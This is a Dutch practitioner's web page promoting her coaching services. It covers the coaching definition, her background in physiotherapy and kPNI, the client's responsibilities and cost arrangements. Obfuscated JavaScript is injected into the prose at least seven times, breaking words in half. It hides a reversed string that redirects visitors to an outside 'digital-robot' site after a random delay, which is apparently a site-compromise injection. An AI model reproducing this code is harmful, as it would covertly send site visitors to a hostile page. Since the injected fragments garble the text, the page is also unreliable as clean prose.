Coaching 2019-02-17T14:25:46+01:00

Coaching

Wat betekent coaching?

NOBCO hanteert de volgende definitie: “Het strategisch en tactisch aanwenden van voornamelijk psychologische, spirituele en communicatieve vaardigheden en technieken, teneinde een individu of groep op eigen kracht bepaalde, zelfgekozen doelen te laten bereiken”.

Wanneer coaching?

Op elke plek waar verandering gewenst is, kan een coach een positieve rol spelen. Omdat coaching zich bezighoudt met het leerproces, verandering en ontwikkeling, zowel bij de individuele mens, in teams, organisaties en zelfs op grotere schaal. Inzicht krijgen in hoe een stagnatie of een probleem is ontstaan werkt verhelderend, waarna een oplossing mogelijk is. Coachen gebeurt methodisch: met inzet van methoden en technieken waarvan de effectiviteit is gebleken dan wel bewezen. Resultaatgerichtheid maakt dat coaching in korte tijd zeer effectief kan zijn.

Ik als coach

Als fysiotherapeute, acupuncturiste en kPNI therapeute heb ik al meer dan 30 jaar een centrum voor therapeutische en preventieve zorg. Ik heb dus ruime medische kennis en ervaring. Daardoor doorzie ik snel of je persoonlijke ontwikkeling wordt belemmerd door een lichamelijke oorzaak of door tekorten, bijvoorbeeld goede vetzuren. Ik kan het resultaat van het coachen versnellen in combinatie met leefstijl adviezen.  Lichaam en geest zijn 1 en bepalen samen het gedrag. En daar zit mijn kracht in coaching.

Verder kan ik goed luisteren, ik oordeel niet, ben betrokken, rustig, positief, praktisch en oplossingsgericht. Hierdoor kom je makkelijk dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tot zelfinzicht en snel resultaat.

  • Ik richt me op de persoon, heel de mens, in plaats van op een probleem of diagnose.
  • Ik richt me op ontwikkeling en groei en zowel op helen en versterken wat de mens in zijn functioneren belemmert als op versterken van wat al krachtig is.
  • Ik schep voorwaarden waardoor het beste uit de gecoachte naar boven komt en deze in staat is zijn eigen koers te bepalen.
  • Ik help je van onbewust ongewenst naar bewust gewenst gedrag.
  • Ik kijk onbevooroordeeld.

Uitgangspunten vormen de waarden, ambities en talenten van de gecoachte. Door coaching neemt het zelfaccepterend, zelfsturend, zelflerend en zelfoplossend vermogen dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toe en worden gewenste resultaten bereikt. Met andere woorden: de gecoachte ervaart keuzevrijheid in zijn handelen en leert zijn talenten verder ontwikkelen, zijn belemmeringen doorbreken of accepteren. Dat resulteert in effectiever gedrag en gewenste resultaten.

De gecoachte bepaalt het doel van het coachtraject en is verantwoordelijk voor het bereiken van daaraan gekoppelde resultaten en zo voor zijn eigen succes. De focus van de coaching is positief en verbeteringsgericht. Ook al zijn er uitstapjes naar het verleden mogelijk, er wordt altijd gewerkt vanuit het heden en van daaruit aan perspectieven voor de dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toekomst.
Tijdens het coachtraject wordt altijd gewerkt met actuele praktijksituaties, meestal werkgerelateerd. Zijpaden naar privésituaties kunnen soms wenselijk zijn. Er vindt een permanente uitwisseling tussen het besprokene tijdens een coachsessie en (re)acties in de werksituatie en zo nodig in de privésfeer.

Omdat ik ook kPNI therapeute ben, heb ik medisch inzicht en zie ik in wanneer het geactiveerd immuunsysteem, door bijvoorbeeld aanwezigheid van een laaggradige ontsteking, belemmeringen veroorzaakt in het psychisch functioneren en presteren en zo mogelijk gedragsbepalend is. Wanneer hier sprake van is, zal de oorzaak eerst opgelost moeten worden. In sommige gevallen, zal coaching hierna niet meer noodzakelijk zijn.

De gecoachte

De gecoachte kan op eigen initiatief komen of op aanraden van bijvoorbeeld een leidinggevende.
Intrinsieke facdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toren (de wil, het verlangen, innerlijke noodzaak, bereidheid dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tot offers, doorzetten) bij de gecoachte vormen een belangrijke voorwaarde voor de effectiviteit van coaching.

Kosten

Coaching is een investering in jezelf die leidt dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tot persoonlijke groei. Wanneer gecoachte op eigen initiatief komt:

  • Als ZZP’er: de kosten zijn aftrekbaar.
  • Als particulier: vanuit de overheid krijgen bedrijven een budget voor persoonlijke ontwikkeling en welbevinden van hun werknemer. Overleg met je leidinggevende of je hiervan gebruik mag maken.
  • Wanneer je leidinggevende je naar een coach stuurt, dan worden de kosten door het bedrijf betaald.

Meer weten? Neem gerust contact op voor meer informatie of het maken van een afspraak.